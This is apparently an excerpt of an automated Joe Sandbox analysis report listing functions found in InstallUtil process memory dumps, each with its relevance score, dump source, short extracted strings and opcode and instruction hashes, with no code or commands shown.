                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ef28c2b531438a82ad566764b1619a6a8eed958314c3eb9f45d2ed2293167b8
                                                        • Instruction ID: 1ab05b80087930bf81a23fd55c0fd1729fec7ba6bad0049168e51272fa734d58
                                                        • Opcode Fuzzy Hash: 5ef28c2b531438a82ad566764b1619a6a8eed958314c3eb9f45d2ed2293167b8
                                                        • Instruction Fuzzy Hash: 594168B1E016189BEB58CF6BD9457CAFAF3BFC8310F14C1AAD50CA6254EB740A858F51
                                                        Function 0661B6D9 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb0127a555d0bffe50c303203ed12275f86a6af8239659391c40305d08363ea4
                                                        • Instruction ID: 10faa5dc944bad391bc66c0b009a86073b57be4e4a51f2c2f41817645db4304f
                                                        • Opcode Fuzzy Hash: bb0127a555d0bffe50c303203ed12275f86a6af8239659391c40305d08363ea4
                                                        • Instruction Fuzzy Hash: B14169B1E016189BEB58CF6BC9457CAFAF3AFC8314F04C1AAD50CA6264DB740A858F50
                                                        Function 01276E70 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$(osq$(osq$(osq$(osq$(osq$,wq$,wq
                                                        • API String ID: 0-1935560061
                                                        • Opcode ID: b6f78275f7f3be4cac492b6c68ab34a4f54400fea36a41eb77663d1be4caab45
                                                        • Instruction ID: 7c1cd08f444ba3b8125278372104d08c5266f1367501f51fce53bdc48fd7e464
                                                        • Opcode Fuzzy Hash: b6f78275f7f3be4cac492b6c68ab34a4f54400fea36a41eb77663d1be4caab45
                                                        • Instruction Fuzzy Hash: 46126B30A106099FCB15CF68D888A9EBBF2FF89314F148599F919DB261DB30ED41CB50
                                                        Function 01278801 Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'sq$4'sq$;sq
                                                        • API String ID: 0-111817264
                                                        • Opcode ID: e98e3dd8aff65514eb3d70d9cdda4031eab2ffe608265d00786f47cb9b3cb2cd
                                                        • Instruction ID: db05f245454d3e6262ad02185cf4b68632d0f4b5fbf5dc1dd255b1347a4d0ab0
                                                        • Opcode Fuzzy Hash: e98e3dd8aff65514eb3d70d9cdda4031eab2ffe608265d00786f47cb9b3cb2cd
                                                        • Instruction Fuzzy Hash: 58F181703245028FEB299B3DC59D73B7AA6EF84740F1844AAE602CB3B6EA75CC41C751
                                                        Function 01277808 Relevance: 3.2, Strings: 2, Instructions: 692COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $sq$$sq
                                                        • API String ID: 0-1184984226
                                                        • Opcode ID: 8469fabb9e6ebd72e1e667b7f3859544b8d7c47ed8ec5c8b52246f705df9d0ca
                                                        • Instruction ID: 4aa865f9790649af72927e6effa0e1af287d05f736424908573db4c4009aad01
                                                        • Opcode Fuzzy Hash: 8469fabb9e6ebd72e1e667b7f3859544b8d7c47ed8ec5c8b52246f705df9d0ca
                                                        • Instruction Fuzzy Hash: 05524275E102198FEB55ABE4C860B9EBF72EF84300F1081A9D10A6B3A5DF349E85DF51
                                                        Function 012756B0 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hwq$Hwq
                                                        • API String ID: 0-741242263
                                                        • Opcode ID: b3872ab42872bc2b9c7f24ebba659d111616ea13006768379ce716b3b72fee9c
                                                        • Instruction ID: 6ec72461ae796bcc5f671068133488e821aa3a9935e2d614956c47b5aec2eb79
                                                        • Opcode Fuzzy Hash: b3872ab42872bc2b9c7f24ebba659d111616ea13006768379ce716b3b72fee9c
                                                        • Instruction Fuzzy Hash: 3491D2317142558FDB1A9F38C898B6FBBA2AF89300F144869E646CB396DF74CC41CB91
                                                        Function 066123E0 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRsq$LRsq
                                                        • API String ID: 0-2113534932
                                                        • Opcode ID: 3149487115058549eb496c504029cd6f77d05239a30c8ea96c62033655c357d3
                                                        • Instruction ID: 78b4296af33d3aa62f11fe9acab7d1f72a0887a239d30809d3fc2068520b9335
                                                        • Opcode Fuzzy Hash: 3149487115058549eb496c504029cd6f77d05239a30c8ea96c62033655c357d3
                                                        • Instruction Fuzzy Hash: 8181C275B001058FCB48DF79D9A496E7BBAEF89610B1581A9E405CF3B5EB30DE42CB90
                                                        Function 01275C10 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq$,wq
                                                        • API String ID: 0-1895925779
                                                        • Opcode ID: aeb65637d2a81178a59509f4c2221cb0ab9c0c0ea22063d53c785559ef2f3ee6
                                                        • Instruction ID: a7d92c542965e70433281a6c6131d451bdde81acc33d22c6c912055efc20a6a7
                                                        • Opcode Fuzzy Hash: aeb65637d2a81178a59509f4c2221cb0ab9c0c0ea22063d53c785559ef2f3ee6
                                                        • Instruction Fuzzy Hash: BF818E35B205068FDB14DF6DC888A6BFBB2FF89214B158569E605DB361DB31EC42CB50
                                                        Function 06619510 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (&sq$(wq
                                                        • API String ID: 0-153982265
                                                        • Opcode ID: b48c952ddd2fb4c3c3469e81a868d40e349f09862acbc9905370397c40132a12
                                                        • Instruction ID: 42dd25b3ecc919077b058c0a8deba90e0b87ef34771a629bff14aa6541b1e5b9
                                                        • Opcode Fuzzy Hash: b48c952ddd2fb4c3c3469e81a868d40e349f09862acbc9905370397c40132a12
                                                        • Instruction Fuzzy Hash: 7A719131F002198BDF59EFA9D8606EEBBB2AF88710F144529E405AB381DF349D02CBD1
                                                        Function 01273428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xwq$Xwq
                                                        • API String ID: 0-2617233878
                                                        • Opcode ID: 93b34428168e8182284fc4740c9f25ace8586b978c6f6cc77da4c61695eb1469
                                                        • Instruction ID: d4cdb8953ca81e4585175530a94a7e517447aebbc7e46cf825a01cbfa4627e8e
                                                        • Opcode Fuzzy Hash: 93b34428168e8182284fc4740c9f25ace8586b978c6f6cc77da4c61695eb1469
                                                        • Instruction Fuzzy Hash: 4831F776B243268BDF1DC9AD59A527FA9A6FBC4310F14043DDA06C3381DFB4CC016661
                                                        Function 01270C8F Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRsq
                                                        • API String ID: 0-3165563352
                                                        • Opcode ID: 373761c63df81ce2b51ff36c4732a6286ea3fc91d27502c677372ddf05843eca
                                                        • Instruction ID: ee21c93997bdb77584d4c542ffd99aaf82803ccc2a45c7bf7be6cfff065a75fe
                                                        • Opcode Fuzzy Hash: 373761c63df81ce2b51ff36c4732a6286ea3fc91d27502c677372ddf05843eca
                                                        • Instruction Fuzzy Hash: 0A229A75D00219DFCB55EF64E994A9DBBB2FF48301F1089AAD409A7359DB306E86CF40
                                                        Function 01270CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRsq
                                                        • API String ID: 0-3165563352
                                                        • Opcode ID: bf9c992f27bd4851c7712b0ccad0313fd8152e99ddfb5b3a233deab5cde61686
                                                        • Instruction ID: ac5cc90f264ad03079da89d036fdf58ccf576052c8af552b4680884701d6d566
                                                        • Opcode Fuzzy Hash: bf9c992f27bd4851c7712b0ccad0313fd8152e99ddfb5b3a233deab5cde61686
                                                        • Instruction Fuzzy Hash: 3B229B75D00219DFCB55EF64E894A9DBBB2FF48301F1089AAD409A7359DB306E86CF40
                                                        Function 0127A660 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq
                                                        • API String ID: 0-609861455
                                                        • Opcode ID: 18f4e62933777022d68efffa8fafc1c34d7b4acb25e92d6b6abb4fb346a3260d
                                                        • Instruction ID: 58e350558ae10eb674d3e6307408ae534f498cfed7c4984425afae3e3b93ebc1
                                                        • Opcode Fuzzy Hash: 18f4e62933777022d68efffa8fafc1c34d7b4acb25e92d6b6abb4fb346a3260d
                                                        • Instruction Fuzzy Hash: 6241E535B042049FCB199B79D894AAEBBB6BFC8750F148469E606D7391DE359C02CB90
                                                        Function 0127A828 Relevance: .4, Instructions: 413COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 397fe2c825a179aec3f4d815a66e9bbe190b9e37561a4362212b7345ab3afd44
                                                        • Instruction ID: 7a58e10a8b246905008c6f7cd5ad5e58ac3b7b34e806a9f77c11a329606292db
                                                        • Opcode Fuzzy Hash: 397fe2c825a179aec3f4d815a66e9bbe190b9e37561a4362212b7345ab3afd44
                                                        • Instruction Fuzzy Hash: 5DF13E75A10215DFCB05CF6DC9849AEBBF6FF88320B1A8499E505AB361DB35EC41CB50
                                                        Function 01277450 Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d85576e2e10e53711fde364ee7786d743520c1c50894ab5c5aac0ffe23c64ba
                                                        • Instruction ID: f25db2c093c213a40380a513a7ab609c757b8d2a44f71251d1ec8c479168341b
                                                        • Opcode Fuzzy Hash: 1d85576e2e10e53711fde364ee7786d743520c1c50894ab5c5aac0ffe23c64ba
                                                        • Instruction Fuzzy Hash: 497128347202568FDB15DF2DC898A6B7BF6AF49640F1900A9EA16CB371EB71DC41CB90
                                                        Function 06613720 Relevance: .2, Instructions: 181COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08f60fb81026280b8d52568f9ba204d339c6201c2083ecdd4fd15102d74fe2a7
                                                        • Instruction ID: 5565006a68b0d2e7fe67bb097ed4a95151dbaa74ba7f4e56eaeb210eb33e39a2
                                                        • Opcode Fuzzy Hash: 08f60fb81026280b8d52568f9ba204d339c6201c2083ecdd4fd15102d74fe2a7
                                                        • Instruction Fuzzy Hash: 5261B074E002289FDB65DF65DC54BDEBBB2BB89300F1091AAE50DA7250EB305E819F40
                                                        Function 0127CED7 Relevance: .2, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5359cb8c2f4c458adb4d5cc4d68122e8a48d06cdb98dfeaceecac73571c16f2a
                                                        • Instruction ID: de983191c57b79fe3717076481cf3aa5d87caa5e86585fe107c37081da0c8945
                                                        • Opcode Fuzzy Hash: 5359cb8c2f4c458adb4d5cc4d68122e8a48d06cdb98dfeaceecac73571c16f2a
                                                        • Instruction Fuzzy Hash: B451B0308A17078FD3062FA4E5EC13EBBA0FB2F797744AD45A14E860A98B305069DB10
                                                        Function 0127CEE8 Relevance: .2, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cbcd995d8aeec1276909275161e7473cdc152f7d55e6144bef91069caef776e
                                                        • Instruction ID: 107b869a3e55e78485c8c6d1ac2a6a38d4863c7e0cbef7034ff0d39a75040b75
                                                        • Opcode Fuzzy Hash: 4cbcd995d8aeec1276909275161e7473cdc152f7d55e6144bef91069caef776e
                                                        • Instruction Fuzzy Hash: ED51A2308A170B8FD3063FA4E5EC13EBB64FB6F797744BD45A14E860A98B305069DB10
                                                        Function 0127E2E9 Relevance: .2, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb06b66c24b6543ecf76977fdfa35f06f5e7369a8169b3a785b34140a50a6643
                                                        • Instruction ID: 2d38e73f9bd5fd1e987b4473ceb8ed28da9c12c9ca40f912425e31f96a1620fe
                                                        • Opcode Fuzzy Hash: bb06b66c24b6543ecf76977fdfa35f06f5e7369a8169b3a785b34140a50a6643
                                                        • Instruction Fuzzy Hash: 515123B4D01218DFDB15DFE4D894AAEBBB2FF88300F208529E905AB395DB355986DF40
                                                        Function 0127CD20 Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67bbff432eb9bba95c76767d1c28e965664e3ff85c27e9e6fc05edca634f110e
                                                        • Instruction ID: e8ac90848dbadb5a56f46d1214b69a4b79d6c230e4e1f13648fd352a9f87c4b5
                                                        • Opcode Fuzzy Hash: 67bbff432eb9bba95c76767d1c28e965664e3ff85c27e9e6fc05edca634f110e
                                                        • Instruction Fuzzy Hash: 32519474E012089FDB58DFA9D9949DDBBF2FF89300F248169E419AB365DB31A901CF50
                                                        Function 0661DCC0 Relevance: .1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1fe4b0552fb3c577df145c774e90b200bed98d0f3833cf930adad5f9bb16309
                                                        • Instruction ID: 1843e63485428f5c38893607c0125518ea16b58b8aa24b2ef2ea5f7ecffd8961
                                                        • Opcode Fuzzy Hash: e1fe4b0552fb3c577df145c774e90b200bed98d0f3833cf930adad5f9bb16309
                                                        • Instruction Fuzzy Hash: D941377191132ADFEB04AFB1D45D7FEBBB1EB4A316F10486AD101663A4CB780A48DF91
                                                        Function 01273908 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 522c7e8e22454c7e549222b84082c81b61ba4fd6776339e497a784dd03371895
                                                        • Instruction ID: b24b56e19a611070c1b31cd5d423f30d73a84a7fb558d12e3a1e4fc4fb06773a
                                                        • Opcode Fuzzy Hash: 522c7e8e22454c7e549222b84082c81b61ba4fd6776339e497a784dd03371895
                                                        • Instruction Fuzzy Hash: C151A375E11208DFCB48DFA9D99489DBBF2FF89311B209469E805AB324DB31AC42CF50
                                                        Function 06619A49 Relevance: .1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3808175bfcf56130e9645019d5ac9e3a45a30e4ce289407afc277f5b309143bb
                                                        • Instruction ID: a946764458aac80b3e78cda108868853e5320dbea0b0c2b4315272b32b7791ec
                                                        • Opcode Fuzzy Hash: 3808175bfcf56130e9645019d5ac9e3a45a30e4ce289407afc277f5b309143bb
                                                        • Instruction Fuzzy Hash: 4751F3B5E002099FDB04DFA9E5946EDBBF2BB49310F14812AE415A7394EB345A4ACF50
                                                        Function 0127F0F9 Relevance: .1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba57e3c338d337ebf111fefab219c8fcb6fa1ee6e76fa7850f1ff0df436ade62
                                                        • Instruction ID: d77eafd7778ef41f0d2b943117607e63c7e0afabbcd7dcafc49598fb984bc456
                                                        • Opcode Fuzzy Hash: ba57e3c338d337ebf111fefab219c8fcb6fa1ee6e76fa7850f1ff0df436ade62
                                                        • Instruction Fuzzy Hash: F651DF75E15228CFCB24DFA8D984BEDBBB2BB49301F1055A9D409A7350D735AE81CF00
                                                        Function 01279A73 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc46ce711f8b8abf5a5e8bce17547bf89dbaabf60857345e667686d8976e97cf
                                                        • Instruction ID: 0a528387948b0a9d4ec66f08dce99d3eb800182d2a99462b8121969ca4324ecb
                                                        • Opcode Fuzzy Hash: dc46ce711f8b8abf5a5e8bce17547bf89dbaabf60857345e667686d8976e97cf
                                                        • Instruction Fuzzy Hash: 4E41D231A14349DFCF16CFA8C844AAEBFB2FF49324F048455EA15AB255E371E991CB90
                                                        Function 06619500 Relevance: .1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c5659c9b7d63ae7035ad7f6aff4c8f27b338a6dd4b8aa49aa98703acb246397
                                                        • Instruction ID: 2befb1284072fde75c442bf54dd76fc98be3e37311e81350b3b8716f49845439
                                                        • Opcode Fuzzy Hash: 0c5659c9b7d63ae7035ad7f6aff4c8f27b338a6dd4b8aa49aa98703acb246397
                                                        • Instruction Fuzzy Hash: 44412071E002199BDF54DFA6C890ADEBBF5BF88710F198229E415BB350DB70A945CBE0
                                                        Function 0127D7DE Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb1bf9d7892c80dcfc6387050b8ead3395ebb9463abb97e291f0a954f92d9072
                                                        • Instruction ID: 905e6393167c0307a75f2c95bb3bbb3d9bb99b288be0e17e7c712ba862a64a5e
                                                        • Opcode Fuzzy Hash: eb1bf9d7892c80dcfc6387050b8ead3395ebb9463abb97e291f0a954f92d9072
                                                        • Instruction Fuzzy Hash: CF413474D24149CFDB09DFE8D484AAEFBB2FF89300F609519D40AAB259D771A882CF14
                                                        Function 06619A58 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0403f62c72f0d6059cd4863a47411c011583eb9b5ef8ecaee92baf567862ef3
                                                        • Instruction ID: a175c9f593e46b1cea295ba95e447a3406ecc382fd9e147c4157b6745ed12a95
                                                        • Opcode Fuzzy Hash: b0403f62c72f0d6059cd4863a47411c011583eb9b5ef8ecaee92baf567862ef3
                                                        • Instruction Fuzzy Hash: 4741C2B4E00208CFDB44DFA9D5947EDBBF2BB49300F14952AE815A7394EB34594ACF50
                                                        Function 0127D77E Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d95e4abb8aa99268736162f2a5024bf500aa1b48493280557f693db46bee1d2b
                                                        • Instruction ID: 7ca20a154a66596e1da2904aa0a36923c8e1f9e53c1faaad4ed8b4615f6c43b9
                                                        • Opcode Fuzzy Hash: d95e4abb8aa99268736162f2a5024bf500aa1b48493280557f693db46bee1d2b
                                                        • Instruction Fuzzy Hash: 58411274D21249CFDB05DFE8E5846AEFBB2FF89310F209519E409A7289D775A882CF14
                                                        Function 0127D630 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16ce6c64b4fed0f8f1f5f7c6ba1b2ba773f51e70155c004e3fd25fe15fbe0b6a
                                                        • Instruction ID: 48d01a6fba31ede897c58b689f10f23306f673ce16b6707ef1262f3d8d14dd79
                                                        • Opcode Fuzzy Hash: 16ce6c64b4fed0f8f1f5f7c6ba1b2ba773f51e70155c004e3fd25fe15fbe0b6a
                                                        • Instruction Fuzzy Hash: E4411670D11249CBDB09DFEAD5446AEFBB2BF89300F14D529D408B7299D771A842CF54
                                                        Function 01274DD0 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ec8d78d934f2106141a2b96cd93f2bc544b322d743c00cd2b8260f802cf9ce2
                                                        • Instruction ID: b769b7f147f3559b6cbb1857487d226974bbf97e9b7bd3a46cd70b2493a1cfd9
                                                        • Opcode Fuzzy Hash: 2ec8d78d934f2106141a2b96cd93f2bc544b322d743c00cd2b8260f802cf9ce2
                                                        • Instruction Fuzzy Hash: 8431973174415AAFDB06AF68D8846AF7F66FF48350F004814FA0587255CB74DD62DB91
                                                        Function 0661DCB1 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4b26bb3a2cc76f3476b8ea7c3d92516d5e8f0c0c2c46ce4bbf002f97c80fefda
                                                        • Instruction ID: 6eb41e152a4fcc69b440abb61ee41fe0a4a73166b9ed65bd6e8005d2f50c1294
